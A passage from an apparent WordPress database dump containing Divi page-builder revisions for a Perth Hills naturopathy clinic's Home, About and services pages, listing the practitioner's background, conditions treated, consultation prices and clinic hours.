Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2023-05-30 09:24:38','2023-05-30 01:24:38','',28,'https://verdenaturopathy.com.au/?p=393',0,'revision','',0),(396,1,'2023-07-28 21:08:49','2023-07-28 13:08:49','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png\" title_text=\"Screen Shot 2022-01-21 at 12.20.02 pm\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2023-07-28 21:08:49','2023-07-28 13:08:49','',27,'https://verdenaturopathy.com.au/?p=396',0,'revision','',0),(398,1,'2023-11-23 12:12:30','2023-11-23 04:12:30','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60-75 min) - $160\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: 